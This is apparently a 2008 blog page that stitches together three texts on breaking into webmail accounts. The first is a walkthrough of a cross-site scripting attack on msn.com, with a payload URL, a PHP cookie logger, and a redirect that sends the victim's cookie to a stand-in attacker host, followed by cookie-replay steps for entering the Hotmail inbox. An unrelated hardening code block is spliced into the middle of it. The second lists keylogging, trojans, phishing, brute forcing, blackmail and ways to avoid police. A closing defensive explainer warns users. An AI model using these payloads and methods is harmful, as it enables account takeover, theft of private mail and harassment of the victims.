Sunday, January 6, 2008

HACK HOTMAIL EMAIL PASSWORDS

This document explains how to exploit a security hole I found in

http://www.hotmail.com/. With this exploit you can access other people’s mailboxes,

view their contacts and much more. All that needs to be done is send this user

an e-mail with a link/url to an internet-page you created. When this user

clicks on this url, his inbox is all yours.

How does it work

One of the following things is needed to log in to Hotmail:

1. When you know his/her e-mail address and password, you can log in with his username and password on http://www.hotmail.com/
2. When you know his/her account information, like country and zip code, and you are able to answer his/her secret question. In this case you can reset his/her password and log in just like option 1, with a new password.
3. When you have access to his alternate e-mail address, you could send a password reset e-mail message to that account to reset his/her password.
4. When you have his/her ‘cookie’ for passport.net or hotmail.msn.com, you can ‘fake’ his/her cookie and make Hotmail believe you are already logged in as this user.

I use option 4 here to make my exploit work. This exploit uses the cookie from hotmail.msn.com to access the ‘victim’s’ inbox. Because the cookie is not limited to the domain hotmail.msn.com, you can also use an exploit on the site msn.com to steal the cookie from the victim. When I searched msn.com for an exploit called “HTML Injection” or “Cross Site Scripting” (XSS), it took me about 30 minutes to find one. With this exploit type I’m able to insert additional pieces of HTML or JavaScript into a page of msn.com.

When I insert the code: ,

the user will see a message box just like the picture below when he visits that site.

The real HTML injection example with popup can be viewed at:
http://ilovemessenger.msn.com/?mkt=nl-nl’);alert(document.cookie);escape(’
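
The injection above works because the `mkt` value lands inside a quoted JavaScript string, and the cookie is worth stealing because script can read it and it is scoped to all of msn.com. As an added example (not code from the original article or from Microsoft; `setMarket`, the function names and the `en-us` fallback are assumptions), this Node.js code puts the vulnerable rendering beside the server-side fixes: an allow-list, context-aware escaping, and a host-only HttpOnly session cookie.

```javascript
'use strict';

// The mkt value from the article's proof-of-concept URL, written with
// straight quotes (the article's typography turned them into curly quotes).
const SAMPLE_MKT = "nl-nl');alert(document.cookie);escape('";

// VULNERABLE (assumed shape of the page, setMarket is hypothetical): the
// query value is pasted into a single-quoted JS string in an inline script,
// so a quote in the value ends the string and the rest runs as code.
function renderVulnerable(mkt) {
  return "<script>setMarket('" + mkt + "');</script>";
}

// Fix 1: allow-list. A market code is language-REGION and nothing else;
// anything that does not match is replaced by a fixed fallback.
const MKT_PATTERN = /^[a-z]{2}-[a-z]{2}$/i;
function normalizeMarket(mkt, fallback = 'en-us') {
  return typeof mkt === 'string' && MKT_PATTERN.test(mkt)
    ? mkt.toLowerCase()
    : fallback;
}

// Fix 2: context-aware output encoding for a JS string literal inside HTML.
// Every character outside [A-Za-z0-9] becomes \uXXXX, so quotes, backslashes,
// "<" (as in </script>) and line terminators cannot leave the string.
function jsStringEscape(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Hardened rendering: validate first, then encode for the output context.
function renderHardened(mkt) {
  return "<script>setMarket('" + jsStringEscape(normalizeMarket(mkt)) + "');</script>";
}

// Fix 3: session cookie attributes. No Domain attribute makes the cookie
// host-only, HttpOnly hides it from document.cookie, Secure keeps it on HTTPS.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// RFC 6265 domain matching: would a cookie set by originHost with the given
// Domain attribute be sent on a request to requestHost?
function cookieSentTo(requestHost, originHost, domainAttr) {
  const host = requestHost.toLowerCase();
  if (!domainAttr) {
    return host === originHost.toLowerCase(); // host-only cookie
  }
  const domain = domainAttr.replace(/^\./, '').toLowerCase();
  return host === domain || host.endsWith('.' + domain);
}

// Summary of the article's scenario with and without the fixes.
function report() {
  return {
    vulnerable: renderVulnerable(SAMPLE_MKT),
    hardened: renderHardened(SAMPLE_MKT),
    wideCookieReachesSubsite:
      cookieSentTo('ilovemessenger.msn.com', 'hotmail.msn.com', '.msn.com'),
    hostOnlyCookieReachesSubsite:
      cookieSentTo('ilovemessenger.msn.com', 'hotmail.msn.com', null),
    setCookie: sessionCookieHeader('session', 'constructed-sample-value'),
  };
}

console.log(report());
```

With the host-only, HttpOnly cookie, a script injected into another msn.com subdomain neither receives the mail session cookie nor can read it through `document.cookie`.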

With the text you can see in the “alert message-box” above, everybody with some knowledge is able to access my inbox. This text is sent by my browser to Hotmail every time I visit a site with the domain “msn.com”. This method is used so Hotmail knows I am still logged in. The text in the popup is called a “cookie”. A trick used by attackers is to fake somebody else’s cookie. I will explain one easy method, although there are different ways of doing it. I can fake cookies with a helper program called “Proxomitron”. Proxomitron acts like a proxy server with the option to change, fake or block HTTP headers. Cookie text, like the text in the popup, is sent by the browser invisibly in an HTTP header called “Cookie”. Because Proxomitron is able to fake headers, this program is very useful to me.

I will explain later how proxomitron must be configured to fake cookies.

How does the attacker get the cookie? Showing a popup to the user with his

cookie information does not help the attacker. The attacker wants the text

now shown in the popup-box. To log cookies the hacker needs to create an

internet-page with PHP or ASP. This is to log some text to a log file on a webserver.

I’ve created a simple PHP script that is able to log text to a log file. I’ve named

this file “cookielogger.php” and its content looks like this:

{ if (!$handle = fopen($filename, ‘a’)) { echo “Error: Unable to write to the log file”; exit; } else

{ if (fwrite($handle, “\r\n” . $_GET[”cookie”]) === FALSE) { echo “Error while writing to log file”; exit; } }

echo “Successfully wrote a string to the log file”; fclose($handle); exit; } echo “nothing to write to the log file”; exit; ?>

I uploaded this file to a webserver. As example I’ll use the

fake internet site http://www.hacker.com/. To test the PHP

script I’ll go to http://www.hacker.com/cookielogger.php?cookie=test.

I can see the text “Successfully wrote a string to the log file”.

When I’m now browsing to http://www.hacker.com/logfile.txt I can see the text “test”.
When I go to http://www.hacker.com/cookielogger.php?cookie=this text is being logged,

the text “this text is being logged” will be appended to the log file: http://www.hacker.com/logfile.txt

Cookielogger.php is now ready to log text strings, so it’s also ready to log cookies.

I use the Cross Site Scripting exploit to inject a code that will redirect the user to

http://www.hacker.com/cookielogger.php with the argument “cookie” filled with the user’s cookie.

So when the user visits the msn site with added code, he will be redirected to

http://www.hacker.com/cookielogger.php?cookie=hiscookie and the hacker

can read his cookie information at the site http://www.hacker.com/logfile.txt because

“hiscookie” is now logged to a text file the hacker can see. The code I’m inserting in msn.com will look like this:

See the two printscreens below of the results with the cookielogger.

Remember “www.hacker.com” is not really used, it’s just an example.

The real HTML injection example to log the cookie is:


http://ilovemessenger.msn.com/?mkt=nl-nl’);

location.href=’http://www.hacker.com/cookielogger.php?cookie=

‘+escape(document.cookie);escape(’

Okay, the exploit is ready to go. We could send the link above to

the victim in the hope he clicks the link.

But there aren’t many people who go to a site like “ilovemessenger.msn.com”.

Also, when the user sees something like “document.cookie”

in the url he’ll probably think twice before clicking it.

When we create a new php page called “redirect.php” with the following content:
http://ilovemessenger.msn.com/?mkt=nl-nl’);

location.href=’http://www.hacker.com/cookielogger.php?cookie=’+escape(document.cookie);escape(’”); exit; ?>

and place this file online on http://www.hacker.com/redirect.php.

Now when we send the victim an email with this link and he clicks

on it he will be redirected to the ilovemessenger site plus exploit,

here he will be redirected to hacker.com/cookielogger.php with

his cookie of msn.com being logged in the log file.

When these actions are completed you are ready to start exploiting the victim.

If anyone really would try to break into somebody’s hotmail account he also

would change cookielogger.php to redirect on, or to show an innocent message,

so that the user wouldn’t notice that his cookie was logged.

When a malicious hacker sends an e-mail containing the link to the redirect

script and the victim opens his new e-mail message he will see something like this:

When the victim clicks the text “click this link” the exploit will come in motion.

In real life there are tons of methods of persuading the victim to click on a link.

The hacker is patiently waiting for a new entry in the file http://www.hacker.com/logfile.txt.

When the user finally clicks the link and the hacker notices extra text in the log file the fun can start.

When the victim has fallen for your trick, the log file looks like this:

Now the hacker has stolen the cookie of the victim, the hacker can proceed in faking his

cookie when entering hotmail. Somewhere at the start of this explanation I talked about

“Proxomitron” to fake cookies. I will now explain how to make the settings to fake this cookie.

Proxomitron looks like this:

Just place a ‘v’ before “Outgoing Header Filters” because that’s what we want to do.

We want to send the user’s cookie to the web server as if it is our own cookie.

Press the button “Headers” to create a new header to fake the cookie.

In the new window, fill in these values:
HTTP Header: “Cookie: a description”
URL Match: “”
Header Value Match: “*”
Replacement text: the user’s cookie

Apply the new header by putting a ‘v’ before the new header in the “Out” column and press apply to save the changes.

Proxomitron is now ready for faking the cookie. Now setting up your browser.

You need to set your browser to use a proxy-server. It differs per browser how to make that setting.
In Internet Explorer: “Tools -> Internet Options… -> Connections -> LAN Settings -> Proxy server”
In Mozilla Firefox: “Tools -> General -> Connection Settings -> Manual proxy configuration”

Set the Address to “127.0.0.1″ (your own pc) and as port : “8080″ (the port of Proxomitron proxy server)

When your browser is setup to use your own proxy server, you can go to the following url :
http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes

When successful you can now see the inbox of the victims mail box.

Ethics and law

Nothing I did was illegal, but when you are hacking somebody else’s inbox you are breaking the law. When this happens you can be prosecuted and go to jail. Don’t let this happen to you!
I published this document to let the world know about the security risk.

By publishing this document Microsoft is forced to patch the hole immediately.
If I hadn’t told Microsoft about this security hole (I mailed them), or if I wouldn’t have found it,

it is possible somebody else would have found it. If this guy would have been a ‘black-hat-hacker’

he and his friends would surely have used this security hole to hack a lot of mail-boxes.

A final word

Security holes have been found in Hotmail multiple times in the past.

After putting this tutorial online, I found out that Microsoft had a similar bug three years ago,

found by N|ghtHawk (a fellow Net-Force member).

I hope that after this time MSN will be more careful with its security, because small exploits can have great consequences.

Well, I use this tweak by “Alex de Vries” from Holland…

see ya with more stuff…!!

enjoy..!!

HACK HOTMAIL EMAIL PASSWORDS

NOTICE: TO ALL CONCERNED Certain text files and messages contained on this site deal with activities and devices which would be in violation of various Federal, State, and local laws if actually carried out or constructed. The webmasters of this site do not advocate the breaking of any law. Our text files and message bases are for informational purposes only. We recommend that you contact your local law enforcement officials before undertaking any project based upon any information obtained from this or any other web site. We do not guarantee that any of the information contained on this system is correct, workable, or factual. We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site.

Note: This file was intentionally named 'How to GET a hotmail password', because I will cover almost all methods I can think of (A lot of them won't actually be hacking).

Note: If there are any mistakes/inaccuracies in this file or any extra info you wanna add, feel free to add it at the bottom after the line and sign it please. Please do not change the original text though.

OK, so you wanna get someone's hotmail password? Whether you are interested in generally understanding more about hacking, just getting revenge on someone, or are bored or for whatever other reasons you might be reading this, um... I forgot what I was gonna say heh. OK nevermind here we go.

Before you start reading about how to actually get hotmail passwords you have to remember some things:

  • Never do this kind of stuff from work/school
  • Remember that Hotmail probably has huge logs (depending on the method you use) of what you have done... etc
  • If you start doing this for money and the cops hear of it and decide to take your PC, even if you have deleted the 'evidence' it can always be easily recovered. Never be confident.
  • Remember now recently hacking has been considered an act of terrorism sometimes and terrorism these days is dealt with extremely severely.
  • It's not a good idea generally to tell many people about this. I read once a file with the rule 'Only tell people you trust with your life'.

Any programs I refer to in this file can either be found in http://www.google.com/ or http://www.download.com/ and you can also find out a lot of info from http://www.textfiles.com and http://www.totse.com/

Methods:

Some methods listed depend on how gullible the victim is, and/or if you can gain physical access to their PC...etc

  1. This is the easiest way I guess. If you are present when your victim is typing his/her password, try peeping over their shoulder lol.
  2. If you have physical access to the machine they use to access their account usually, try installing a keylogger (you can download them from anywhere on the net) These secretly record all keystrokes on the computer. If it records it in a simple text file, then search for their username and see what comes right after it. Remember that if they mistype it and use 'del' or 'backspace' it might be a little tricky for you.
  3. If you have physical access to the machine your victim usually uses, and their password is saved in MSN for example or something like Outlook but as asterisks (*) then download 'Snadboy's Revelation' (v. small program) which will easily reveal the password.
  4. On a spy site once, I saw a little device you plug your keyboard in, and then you plug that into your PC, where your keyboard usually plugs in. Hardly noticeable and not too expensive so you might wanna look out for it if you are paranoid. It was able to record the last 36,000 keys pressed I think.
  5. If your victim ever types their password in a space where it doesn't get changed into asterisks (*) (I don't know why or where that would ever be the case) then if you have a 'Van Eck Phreaking' Device then you could watch their screen from a remote location. Van Eck phreaking is when you catch the electromagnetic field that the monitor emits and reproduce the image. This method is sooo unlikely and almost pointless for me to type up lol but I thought I'd waste my and your time.
  6. With a trojan like Sub7 for example you can take control of people's computers. You can get 'saved' passwords (cached) like if they are already typed in MSN as *'s and you can also activate a keylogger.
  7. If you download 'Ghostmail' you can fake an email coming from the 'Hotmail Team' or whatever, and make it sound all formal and pretend that you need to verify that they are the rightful owners or whatever and ask them to reply with the password. You can make it reply to you but seem to come from a different address.
  8. There was a file that my anti-virus considered to be a virus I downloaded a few years ago, but I don't have anymore (Accidental Data Loss) so I don't know the name anymore. It was a little window that came up and told you that your cookie has expired (It looked soo real) and asked you to type in your password and username. Then when you type it in it saves a file to your C drive, which you would have to get from the victim's computer somehow, for example using a RAT (Remote Administration Trojan), a program that allows you to control someone's computer.
  9. If you know the victim well try guessing the password or blackmailing/getting it out of someone who knows. Use your imagination.
  10. Look around the victim's desk for post-its or whatever.
  11. Try Sex, Love, Mum, God, 1234 (or 4321 etc etc etc) or the name of someone they love, try it backwards. Also try secret, and password and the last 4 digits of their phone number..etc.
  12. NOTE: The easiest way for hacker sometimes to get a password (this doesn't really apply in this case) is to call up and ask for it. For example you could do some research on your victim and call up and say: 'Hi, I am John Smith and I forgot my password.. I left it on my desk at work somewhere. Can you give it to me please so I can work from home' or use your common sense. Social Engineering.
  13. If you are devious/evil enough you can gain the victim's trust somehow to get it.
  14. Pay a hacker to do it for you.
  15. If you get a different password of theirs, usually people use the same passwords for everything
  16. OK here we go. This method is the method most hackers will talk about if you ask them how to hack hotmail. This is probably the nearest to hacking anyway. Go to http://www.hackology.com/ and download Munga Bunga's HTTP Brute Forcer AND The definition files package (and a good word list if you can find one somewhere - but you will have to modify it from *.txt to *.lst and put it in the correct location, replacing the old one). Once you are ready, READ all of the help files that come with it and then use common sense to tick the appropriate boxes in the brute forcer. (Tick 'Don't try passwords shorter than 8 characters) because Hotmail doesn't allow you to have shorter passwords than that so it saves time. Munga Bunga's is the quickest one software wise. Depending on the quality of your wordlist and your connection speed though it could take days/hours to get someone's password this way.
  17. What you could do is, you make a site saying something like 'Send an email to .....@hotmail.com and in the email subject line put your victim's username, followed by your username and your password, separated with dots. Within a few days you should receive an email with your victim's password as the hotmail servers will have given your username admin privileges.' Basically you con people into giving you their passwords.
  18. You could also copy all of the HTML code of the hotmail site and use it on your own site and buy a domain name really similar like www.hotnail.com and send an email using Ghostmail telling people to check out the new and better service etc or tell your friends. (In the email tell them to click on a link not type it out otherwise they will notice - Link like CLICK HERE). With this method you will have to change the HTML code slightly though so that it sends the info to you somehow (not sure how as I am not that good with HTML) and then link them back to hotmail or something so they don't notice. (CHECK FURTHER ON IN THE FILE THERE IS A METHOD SIMILAR)
  19. OK there are 4 methods by SnEzE here that I have, but I am not sure they work because I have never tried them. Here they are anyway: ( I Will put my comments in XX's )

    Brute force hacking

    a. Use telnet to connect to port 110 (Hotmail´s server)

    b. Type USER and then the victim´s username

    c. Type PASS and then the guess a password

    d. Repeat that until U have found the correct password.

    !. This is called brute force hacking and requires patience. It´s better than trying to guess the victims password on hotmail homepage only because it´s faster.

    XX I am not sure this works as this file might be ancient XX

  20. By SnEzE again:

    The Best way

    a. Get the username of the victim ( It usually stands in the address-field )

    b. Then type " www.hotmail.com/cgi-bin/start/victimsusername "

    c. You´re in!

    !. This hack only works if you are on the same network or computer as the victim and if he doesn´t log out.

    XX This probably works. Just a guess XX

  21. By SnEzE again:

    I_3_I - The old way

    a. Go to Hotmail´s homepage and get a account (if you don´t already got one)

    b. Log Out

    c. Now type the victims username.

    d. Look at the source code. XX In Internet Explorer, it's View, Source I think. XX

    e. On the fifth row you should find "action=someaddress"

    d. Copy that address and paste it into the address-field

    e. You´re in...

    !. As you can see it´s a long procedure and the victim have plenty of time to log out.

  22. By SnEzE again:

    I_4_I - Another...

    a. Go to hotmail´s homepage

    b. Copy the source code.

    c. Make a new html file with the same code but change method=post to method=enter

    d. "view" the page

    e. Change the address to www.hotmail.com/ (don´t press enter!)

    f. Make the victim type in his username and password

    g. Look in the address-field. There you´ll see ...&password:something...

    !. This is the way I use, because it lets you know the password. ( If he exits the browser you can see the password in the History folder! I´ve made an example of this trick that you can use at: hem1.passagen.se/christog/index.htm. Good Luck!

XX Here is the rest of his file XX

READ!

Hotmail's sysops have changed the "system" so that the victim may log out even if you are inside his/her account. So don't waste your time!

This text comes from http://hem1.passagen.se/christog/hotmail.htm Remember that this is V.2.0.. More will come... http://www.themoleman.co.uk/hacking.htm

XX Don't know how up to date this is though... XX

OK After ages I think those are all the methods I can think of. Remember to feel free to add at the bottom after the line! Oh and try to keep the formatting so that it doesn't become unpleasant for others to read.

Now that you have read this file you don't have an excuse to bug hackers with stupid questions about hacking hotmail anymore!! (And remember even stuff you might think is hacking can't even be considered hacking sometimes.)

One more thing. Think of this as a bonus. Here is a file I wrote quickly a few weeks ago, because of the number of people bugging me about it so here it is:

This file was written, because I have found too many people asking me how to get rid of the MSN 'Pic' Virus.

  1. Press Ctrl+Alt+Del ONCE and select 'MsgSprd'
  2. Hit End Task
  3. Go to your 'Received Files' folder (you can get to it in MSN using: File, Open Received Files, OR you will probably find it in C:\My Documents\Messenger Service Received Files)
  4. Delete the pic file. It will usually be called 'pic1234....exe' (You might not see the 'exe') -- IF you get a message telling you you can't delete it, because windows is using it then you have to repeat Step 1 and 2.
  5. Go to 'Start'
  6. Then 'Run'
  7. Type: 'msconfig' and press Enter/Return
  8. Select the 'Startup' Tab
  9. UNtick the box left of 'MSN Messenger Service'
  10. Press 'Apply'
  11. Press 'OK'
  12. A Message should appear asking you if you want to restart, but you don't really need to. You should though. --IF next time you start up, it gives you an error message about pic or MsgSprd or something you will have to make sure you did steps 5 - 11 right.
  13. After restarting you are free of the virus ;)

Encrypted_Error

NOTE: That only works on some versions of Windows!

Also now that you know all this, I hope you use it sensibly and don't be a right bastard/bitch with it.

'Knowledge is power' heh just thought I'd add that. I remember that when I think of hacking!

Encrypted_Error

HOW TO HACK YAHOO, HOTMAIL, AOL

We get numerous calls from people who want to recover AOL®, Yahoo® or Hotmail® or other online and email passwords. We do not do this type of work. Many of these people claim that they have lost their passwords because they have been hacked and now need to get their password back. As we have reviewed information on the web, we found very little real information about the actual techniques that could be used to hack these services. So we decided to pull together a detailed explanation.

What follows is a detailed explanation of the methodologies involved. We do not condone any illegal activity and we clearly mention in this article techniques that are illegal. Sometimes these methods are known as "Phishing."

THE HOAX

Let's dispose of one technique that is absolutely a hoax (meaning a fraud: something intended to deceive; deliberate trickery intended to gain an advantage.) If you see a newsgroup post or web page with something like the following, it is a hoax and will not work.

: : : (([[THIS REALLY WORKS ]])) : : :

(1) send an E-mail to passwordrecovery@yourdomainhere.com

(2) In the subject box type the screenname of the person whose password you wish to steal

(3) In the message box type the following: /cgi-bin/start?v703&login.USER=passmachine&class=supervisor&f={your aol password}&f=27586&javascript=ACTIVE&rsa

(4) Send the e-mail with priority set to "high" (red ! in some mailprograms)

(5) wait 2-3 minutes and check your mail

(6) Read the message.-Where YOUR password was typed before, NOW, the password of the screenname in the code string is there!!!

Why does this work? It's a special decryption-server that AOL-employees can use to decrypt passwords. The aolbackdoor account is a bot that reads your authentication from the message body and identifying you as a valid AOL Staff-member, you will get the password mailed back to you. The trick is that this Bot's script seems to be a little bit buggy and it automatically recognises you as a supervisor (AOL-Staff member), even if you use a normal AOL account. This means, that EVERYONE having a valid AOL account can hack as many other accounts as he wants.

This is just a scam to steal your password and may explain some of the calls we get from people saying they were hacked. Never give your password to anyone. No legitimate web service or customer service representative will ask for it or need it. There is no magic email address or series of commands that will reveal the passwords of users.

LOCALLY STORED PASSWORDS

Most browsers, including Internet Explorer® and Netscape®, the AOL® client, and Windows® Dial-Up Connections allow you the option to store passwords. These passwords are stored on the local machine and (depending upon where and how it is stored) there is usually a method of recovering these passwords. Storing any password locally is insecure and may allow the password to be recovered by anyone who has access to the local machine. While we are not currently aware of any program to recover locally stored AOL® passwords, we do not suggest that these are secure. Software does exist that can recover most of the other types of locally stored passwords.

TROJAN

A Trojan is a program that is sent to a user that allows an attacker to control functions of the target computer, recover information from the target or to delete or damage files on the target. The name Trojan is given because the program will usually come attached to some other program or file that entices you to run it. There are a wide variety of Trojans, any number of which can be programmed to capture passwords as they are typed and to email or transmit them to a third party. To protect yourself against Trojans, you should never execute or download software or files that are not from a trusted source. It is critical that anyone working on the internet use a virus protection program (which should catch most Trojans.) Note that since a Trojan requires the password to be typed or stored in order to be recovered, this is not an effective way to recover your own password. It could explain, however, how someone could lose their password to a hacker. Sending someone a Trojan program is certainly illegal and we do not recommend or condone this activity. A Trojan is unlikely to be effective in recovering a particular account password since it requires the target to install it. However, hackers will often bulk mail Trojans to thousands of people in the hope that a small percentage will get caught. Legitimate account holders who may have been caught by a Trojan and can authenticate themselves should contact their service provider to have their account passwords reset.

KEYLOGGER

A keylogger is a program or piece of hardware that records all keyboard keystrokes to an encrypted file which can then be read later. Based on the order of the keystrokes, it is usually easy to identify the password(s) from the file later. Like the Trojan, this also requires that someone actually type the password. Keyloggers come in two types: hardware and software. A hardware keylogger can be fitted between the keyboard cable and the computer and can be activated with a few keystrokes. It is then left in place until after the password that you are looking to recover is typed. Later it is removed and the file of keystrokes is examined for the password. A hardware keylogger is undetectable by anti-virus software. A software keylogger is installed on a system and effectively has the same function; however, it is a little bit more complex to use since it must be installed to run stealthily to be effective. A keylogger could be used to steal a password from someone who is using an office computer or sharing a computer. It is possible that installing and using such a device or piece of software could be illegal depending upon whether the target has a presumption of privacy when using the computer on which the keylogger is installed.

IMPERSONATION

It is possible to impersonate a program on a computer by launching windows that look like something else. For instance, let's say you login to the MSN® service and visit a website (in this case a hostile website.) It would be possible for this website to pop-up some windows that look like something else. They could look almost identical to windows that an inexperienced user might expect from his local computer.

If these could trick you into entering your password, then you could end-up sending your password to the attacker. Windows such as these could be created to mirror virtually any program or series of actions. Your browser will likely identify your operating system and your IP address might identify your ISP. Therefore, a hostile website could target you with a series of screen shots that look exactly as they should on your system. The key is that the screen shots are not coming from your system, but are coming from the hostile website. First, creating such a hostile website is probably fraudulent and illegal. We do not recommend or condone this activity. To protect yourself against this type of attack, make sure to configure your browser for high security and enable warnings for any code that is executed on your system.

SNIFFING

If two people do not share the same computer, but do share the same network, it may be possible for one to sniff the others' packets as they sign-on. The traffic between your computer and the internet site you are accessing may be able to be recorded and decrypted or "played-back." This is not a simple attack to execute, but is possible if two people are close to one another and share a hub. Again, this is likely to be illegal and we do not condone this activity.

BRUTE-FORCE ATTACK

Many people want to find software to perform a brute-force attack. This is really impractical. It would take hundreds of thousands of years to attempt any kind of reasonable brute-force attack on AOL®, Yahoo® or Hotmail® and this would expand exponentially if the password is longer than the minimum length. Using multiple computers or multiple sessions could reduce this to merely thousands of years. This is highly illegal since these services own the servers on which an account is hosted. Even if you are hacking your own account, you don't own the servers and the service is going to monitor and log this activity. It is extremely unlikely that you could recover a password in this way, but it is extremely likely that you'd be arrested and prosecuted for doing this.

SOCIAL ENGINEERING

Social engineering is the name given to the art of attacking the person, rather than the computer or system. The basic principle is that many people can be talked into giving someone else their id and password if they think it is someone that they can trust. For instance, I might call someone and say I was from AOL and that I was finally getting around to responding to their technical support question. I would then ask you to describe the problem that you are having and tell you that we have a solution. However, I just need to verify the account. Can you give me the username and password again? A surprising number of people would fall for this obvious scam. There is no limit as to how elaborate this can be. The more information that is given by the caller, the more realistic or believable the call is. Again, never give your password to anyone. No legitimate customer service representative will ask for this information.

These are the basic methods that we are aware of for hacking an AOL®, Yahoo®, Hotmail® or any other dial-up or on-line password. Hopefully this will answer some questions and help you protect yourself against these attacks.